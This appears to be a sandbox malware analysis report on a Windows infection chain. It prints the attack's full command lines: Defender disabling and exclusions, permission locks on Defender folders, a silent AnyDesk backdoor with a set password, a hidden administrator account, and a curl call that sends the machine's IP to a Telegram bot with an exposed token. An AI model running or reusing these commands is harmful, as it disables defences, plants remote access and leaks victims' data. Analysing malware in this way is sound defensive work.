Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\smss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\smss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskkill = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\odt\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskkill = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\odt\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Admin\\Templates\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\odt\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\runtimeMonitor\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Media\\Sonata\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\runtimeMonitor\\sppsvc.exe\""	ComdriverSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ipinfo.io
16 ipinfo.io

flow	ioc
17	ipinfo.io
16	ipinfo.io

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Drops file in Program Files directory 17 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Program Files\Windows Multimedia Platform\088424020bedd6	ComdriverSvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\taskkill.exe	ComdriverSvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\9359ef1c5c0f9d	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\cmd.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\6203df4a6bafc7	ComdriverSvc.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SearchUI.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Idle.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\lsass.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\dab4d89cac03ec	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\ebf1f9fa8afd6d	ComdriverSvc.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\taskhostw.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\6ccacd8608530f	ComdriverSvc.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\fontdrvhost.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\5b884080fd4f94	ComdriverSvc.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\smss.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Multimedia Platform\conhost.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\69ddcba757bf72	ComdriverSvc.exe

Drops file in Windows directory 3 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Windows\Media\Sonata\dwm.exe	ComdriverSvc.exe
File created	C:\Windows\Media\Sonata\6cb0b6c459d5d3	ComdriverSvc.exe
File created	C:\Windows\MiracastView\en-US\timeout.exe	ComdriverSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 57 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4832	schtasks.exe
2716	schtasks.exe
3988	schtasks.exe
1752	schtasks.exe
396	schtasks.exe
816	schtasks.exe
308	schtasks.exe
2260	schtasks.exe
3016	schtasks.exe
1244	schtasks.exe
4544	schtasks.exe
4220	schtasks.exe
3352	schtasks.exe
4480	schtasks.exe
2724	schtasks.exe
1252	schtasks.exe
2188	schtasks.exe
388	schtasks.exe
2128	schtasks.exe
1408	schtasks.exe
3972	schtasks.exe
3124	schtasks.exe
3148	schtasks.exe
1680	schtasks.exe
3908	schtasks.exe
2344	schtasks.exe
1260	schtasks.exe
2144	schtasks.exe
1284	schtasks.exe
3624	schtasks.exe
656	schtasks.exe
3652	schtasks.exe
2900	schtasks.exe
4732	schtasks.exe
5080	schtasks.exe
4944	schtasks.exe
2004	schtasks.exe
1984	schtasks.exe
4872	schtasks.exe
2872	schtasks.exe
3068	schtasks.exe
5064	schtasks.exe
588	schtasks.exe
2704	schtasks.exe
4464	schtasks.exe
188	schtasks.exe
4792	schtasks.exe
3796	schtasks.exe
4356	schtasks.exe
5052	schtasks.exe
4448	schtasks.exe
3888	schtasks.exe
4460	schtasks.exe
3180	schtasks.exe
2236	schtasks.exe
3792	schtasks.exe
4656	schtasks.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

4400 timeout.exe
5988 timeout.exe
592 timeout.exe
2612 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

5036 taskkill.exe
3748 taskkill.exe

pid	process
4400	timeout.exe
5988	timeout.exe
592	timeout.exe
2612	timeout.exe

pid	process
5036	taskkill.exe
3748	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

AnyDesk.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	AnyDesk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	AnyDesk.exe

Modifies registry class 18 IoCs

Processes:

wsappz.exedc.exeComdriverSvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	wsappz.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	dc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	wsappz.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	ComdriverSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe1.exe

pid	process
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe
4644	1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe1.exeComdriverSvc.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	4644	1.exe
Token: SeAssignPrimaryTokenPrivilege	4644	1.exe
Token: SeIncreaseQuotaPrivilege	4644	1.exe
Token: 0	4644	1.exe
Token: SeDebugPrivilege	2732	ComdriverSvc.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeIncreaseQuotaPrivilege	4672	powershell.exe
Token: SeSecurityPrivilege	4672	powershell.exe
Token: SeTakeOwnershipPrivilege	4672	powershell.exe
Token: SeLoadDriverPrivilege	4672	powershell.exe
Token: SeSystemProfilePrivilege	4672	powershell.exe
Token: SeSystemtimePrivilege	4672	powershell.exe
Token: SeProfSingleProcessPrivilege	4672	powershell.exe
Token: SeIncBasePriorityPrivilege	4672	powershell.exe
Token: SeCreatePagefilePrivilege	4672	powershell.exe
Token: SeBackupPrivilege	4672	powershell.exe
Token: SeRestorePrivilege	4672	powershell.exe
Token: SeShutdownPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeSystemEnvironmentPrivilege	4672	powershell.exe
Token: SeRemoteShutdownPrivilege	4672	powershell.exe
Token: SeUndockPrivilege	4672	powershell.exe
Token: SeManageVolumePrivilege	4672	powershell.exe
Token: 33	4672	powershell.exe
Token: 34	4672	powershell.exe
Token: 35	4672	powershell.exe
Token: 36	4672	powershell.exe
Token: SeIncreaseQuotaPrivilege	1224	powershell.exe
Token: SeSecurityPrivilege	1224	powershell.exe
Token: SeTakeOwnershipPrivilege	1224	powershell.exe
Token: SeLoadDriverPrivilege	1224	powershell.exe
Token: SeSystemProfilePrivilege	1224	powershell.exe
Token: SeSystemtimePrivilege	1224	powershell.exe
Token: SeProfSingleProcessPrivilege	1224	powershell.exe
Token: SeIncBasePriorityPrivilege	1224	powershell.exe
Token: SeCreatePagefilePrivilege	1224	powershell.exe
Token: SeBackupPrivilege	1224	powershell.exe
Token: SeRestorePrivilege	1224	powershell.exe
Token: SeShutdownPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeSystemEnvironmentPrivilege	1224	powershell.exe
Token: SeRemoteShutdownPrivilege	1224	powershell.exe
Token: SeUndockPrivilege	1224	powershell.exe
Token: SeManageVolumePrivilege	1224	powershell.exe
Token: 33	1224	powershell.exe
Token: 34	1224	powershell.exe
Token: 35	1224	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AnyDesk.exe

pid process

5416 AnyDesk.exe
5416 AnyDesk.exe
5416 AnyDesk.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDesk.exe

pid process

5416 AnyDesk.exe
5416 AnyDesk.exe
5416 AnyDesk.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

1.exe1.exe

pid process

4644 1.exe
4868 1.exe

pid	process
5416	AnyDesk.exe
5416	AnyDesk.exe
5416	AnyDesk.exe

pid	process
5416	AnyDesk.exe
5416	AnyDesk.exe
5416	AnyDesk.exe

pid	process
4644	1.exe
4868	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exeschtasks.execmd.exedc.exeany.execmd.exenet.exenet.exenet.exeWScript.execmd.exe

description	pid	process	target process
PID 3476 wrote to memory of 5056	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 5056	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 5056	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 2708	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 2708	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 2708	3476	tmp.exe	powershell.exe
PID 3476 wrote to memory of 4644	3476	tmp.exe	1.exe
PID 3476 wrote to memory of 4644	3476	tmp.exe	1.exe
PID 3476 wrote to memory of 4644	3476	tmp.exe	1.exe
PID 3476 wrote to memory of 656	3476	tmp.exe	schtasks.exe
PID 3476 wrote to memory of 656	3476	tmp.exe	schtasks.exe
PID 3476 wrote to memory of 656	3476	tmp.exe	schtasks.exe
PID 3476 wrote to memory of 3944	3476	tmp.exe	any.exe
PID 3476 wrote to memory of 3944	3476	tmp.exe	any.exe
PID 3476 wrote to memory of 3944	3476	tmp.exe	any.exe
PID 3476 wrote to memory of 2404	3476	tmp.exe	dc.exe
PID 3476 wrote to memory of 2404	3476	tmp.exe	dc.exe
PID 3476 wrote to memory of 2404	3476	tmp.exe	dc.exe
PID 656 wrote to memory of 4080	656	schtasks.exe	cmd.exe
PID 656 wrote to memory of 4080	656	schtasks.exe	cmd.exe
PID 656 wrote to memory of 4080	656	schtasks.exe	cmd.exe
PID 4080 wrote to memory of 5076	4080	cmd.exe	chcp.com
PID 4080 wrote to memory of 5076	4080	cmd.exe	chcp.com
PID 4080 wrote to memory of 5076	4080	cmd.exe	chcp.com
PID 2404 wrote to memory of 4364	2404	dc.exe	WScript.exe
PID 2404 wrote to memory of 4364	2404	dc.exe	WScript.exe
PID 2404 wrote to memory of 4364	2404	dc.exe	WScript.exe
PID 3944 wrote to memory of 3160	3944	any.exe	cmd.exe
PID 3944 wrote to memory of 3160	3944	any.exe	cmd.exe
PID 3944 wrote to memory of 3160	3944	any.exe	cmd.exe
PID 4080 wrote to memory of 4400	4080	cmd.exe	timeout.exe
PID 4080 wrote to memory of 4400	4080	cmd.exe	timeout.exe
PID 4080 wrote to memory of 4400	4080	cmd.exe	timeout.exe
PID 3160 wrote to memory of 4348	3160	cmd.exe	chcp.com
PID 3160 wrote to memory of 4348	3160	cmd.exe	chcp.com
PID 3160 wrote to memory of 4348	3160	cmd.exe	chcp.com
PID 3160 wrote to memory of 3724	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 3724	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 3724	3160	cmd.exe	net.exe
PID 3724 wrote to memory of 4840	3724	net.exe	net1.exe
PID 3724 wrote to memory of 4840	3724	net.exe	net1.exe
PID 3724 wrote to memory of 4840	3724	net.exe	net1.exe
PID 3160 wrote to memory of 2448	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 2448	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 2448	3160	cmd.exe	net.exe
PID 2448 wrote to memory of 592	2448	net.exe	timeout.exe
PID 2448 wrote to memory of 592	2448	net.exe	timeout.exe
PID 2448 wrote to memory of 592	2448	net.exe	timeout.exe
PID 3160 wrote to memory of 2568	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 2568	3160	cmd.exe	net.exe
PID 3160 wrote to memory of 2568	3160	cmd.exe	net.exe
PID 2568 wrote to memory of 5052	2568	net.exe	schtasks.exe
PID 2568 wrote to memory of 5052	2568	net.exe	schtasks.exe
PID 2568 wrote to memory of 5052	2568	net.exe	schtasks.exe
PID 4364 wrote to memory of 3976	4364	WScript.exe	cmd.exe
PID 4364 wrote to memory of 3976	4364	WScript.exe	cmd.exe
PID 4364 wrote to memory of 3976	4364	WScript.exe	cmd.exe
PID 3160 wrote to memory of 5036	3160	cmd.exe	powershell.exe
PID 3160 wrote to memory of 5036	3160	cmd.exe	powershell.exe
PID 3160 wrote to memory of 5036	3160	cmd.exe	powershell.exe
PID 3976 wrote to memory of 2732	3976	cmd.exe	ComdriverSvc.exe
PID 3976 wrote to memory of 2732	3976	cmd.exe	ComdriverSvc.exe
PID 3160 wrote to memory of 3748	3160	cmd.exe	taskkill.exe
PID 3160 wrote to memory of 3748	3160	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4644

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
2⤵
PID:656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:5076

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:5048

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:4776

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:300

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:5020

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "TrustedInstaller:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:5904

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:1284

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Users:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:5384

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:5864

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4348

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:4840

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:592

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:5052

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
PID:5036

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
PID:4596

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Modifies registry class
PID:412

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:5988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
4⤵
PID:5916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
5⤵
PID:3624

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
4⤵
- Executes dropped EXE
PID:5656

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
5⤵
PID:4612

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
6⤵
PID:2096

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:5344

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:5304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadString('https://ipinfo.io/ip')"
4⤵
PID:5664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:4332

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:4180

\??\c:\windows\curl.exe
c:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="ANY_HMAHKCMS'id:'"0"'ip:'"154.61.71.13"" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"
4⤵
PID:4224

C:\Windows\SysWOW64\net.exe
net user oldadministrator "Pass32552" /add
4⤵
PID:3124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user oldadministrator "Pass32552" /add
5⤵
PID:5060

C:\Windows\SysWOW64\net.exe
net localgroup Administrators oldadministrator /ADD
4⤵
PID:1096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators oldadministrator /ADD
5⤵
PID:5904

C:\Windows\SysWOW64\net.exe
net localgroup administradores oldadministrator /add
4⤵
PID:1944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administradores oldadministrator /add
5⤵
PID:2728

C:\Windows\SysWOW64\net.exe
net localgroup administratoren oldadministrator /add
4⤵
PID:4608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administratoren oldadministrator /add
5⤵
PID:648

C:\Windows\SysWOW64\net.exe
net localgroup administrateurs oldadministrator /add
4⤵
PID:4776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrateurs oldadministrator /add
5⤵
PID:4340

C:\Windows\SysWOW64\net.exe
net localgroup администраторы oldadministrator /add
4⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup администраторы oldadministrator /add
5⤵
PID:4432

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
4⤵
PID:744

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
